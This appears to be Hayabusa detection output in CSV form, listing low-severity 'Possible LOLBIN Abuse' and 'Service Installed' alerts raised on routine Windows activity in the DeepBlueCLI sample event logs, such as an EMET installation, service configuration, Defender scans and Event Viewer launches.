Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa28 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:39:28.761 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:39:28.771 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:39:28.809 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:46:10.436 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1158 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:46:27.488 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup (1).msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0x14c8 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:46:27.704 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x2ec | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:47:09.257 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc48 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:47:09.370 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x16bc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:01.641 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 
29CF125E202451A4ADA81BD9D0C1A3B7 | Path: C:\Windows\System32\msiexec.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:09.250 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 22A181542763035A5FF1244203DB5EDC E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:18.846 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xa48 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.301 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetTcpPortSharing restricted | Path: C:\Windows\System32\sc.exe | PID: 0x13e8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetTcpPortSharing SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.355 
+09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Net.Tcp Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabled,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-02 05:48:20.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetTcpActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.379 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetTcpActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1558 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.416 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Net.Pipe Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabled,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-02 05:48:20.426 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetPipeActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x1660 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.439 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetPipeActivator 
SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1234 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.450 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Net.Msmq Listener Adapter | Path: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"" -NetMsmqActivator | Account: NT AUTHORITY\NetworkService | Start Type: disabled",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-02 05:48:20.460 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetMsmqActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x968 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetMsmqActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x710 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:22.723 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: ASP.NET State Service | Path: %SystemRoot%\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe | Account: LocalSystem | Start Type: disabled,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-02 05:49:59.321 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: 
C:\Windows\System32\dllhost.exe | PID: 0x128c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:05.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup (1).msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0x17e4 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:05.541 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:19.219 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4DE932ADC1206E85CE03A5855ECF29FC | Path: C:\Windows\System32\msiexec.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:19.686 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Microsoft EMET Service | Path: ""C:\Program Files\EMET 5.5\EMET_Service.exe"" | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-02 05:50:19.909 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 
22F8D0F1805E128ED9C40EA3A4181C89 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:50:20.040 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" copy hklm\software\microsoft\emet_up hklm\software\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x59c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:50:20.058 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""regsvr32.exe"" /s ""C:\Program Files\EMET 5.5\EMET_CE.DLL"" | Path: C:\Windows\System32\regsvr32.exe | PID: 0x17d4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:50:20.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" delete hklm\software\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x13d4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:50:20.214 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" copy hklm\software\policies\microsoft\emet_up hklm\software\policies\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x17c0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:50:20.258 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" delete hklm\software\policies\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x14cc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:53:20.687 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1598 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:53:20.767 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa1c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:53:20.804 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x364 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:53:20.815 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:53:20.853 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1628 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 06:24:37.363 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x16d4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 06:24:37.378 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x148c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:08:33.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:08:33.233 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:08:33.396 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x175c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:08:53.121 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1360 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:10:30.765 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:46:22.988 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1780 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:46:23.139 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x100 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:46:23.201 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:48:22.957 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x8d0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:00:00.476 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1698 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:04:56.561 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x16ac | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:05:21.063 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x994 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:14.714 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0x13a0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:14.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x10f4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:39.238 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:39.356 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcb4 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:39.409 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
